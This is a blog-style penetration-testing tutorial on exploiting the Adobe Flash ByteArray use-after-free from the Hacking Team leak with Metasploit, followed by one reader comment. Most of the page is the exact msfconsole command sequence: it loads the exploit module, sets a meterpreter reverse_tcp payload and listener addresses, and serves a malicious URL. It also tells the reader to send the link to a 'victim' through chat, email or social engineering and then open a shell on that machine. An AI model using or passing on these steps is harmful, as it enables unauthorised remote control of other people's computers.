Categories

Archives

Kali Linux, Penetration Testing

Exploit Remote PC using Adobe Flash Player ByteArray Use After Free

This module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint “Rebecca” (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.

Exploit Targets

Windows 7

Adobe Flash 18.0.0.194

Firefox 38.0.5

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/adobe_flash_hacking_team_uaf

msf exploit (adobe_flash_hacking_team_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_hacking_team_uaf)>set lhost 192.168.0.182 (IP of Local Host)

msf exploit (adobe_flash_hacking_team_uaf)>set srvhost 192.168.0.182

msf exploit (adobe_flash_hacking_team_uaf)>set uripath /

msf exploit (adobe_flash_hacking_team_uaf)>exploit 

Now an URL you should give to your victim http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into Victims command prompt.

One thought on “Exploit Remote PC using Adobe Flash Player ByteArray Use After Free

  1. Ok thanks for deleting my question that’s a good way for helping people, it was juste to do a POC of EMET protection i’m also in ethical hacking and was hoping for some help but i was wrong :/

Comments are closed.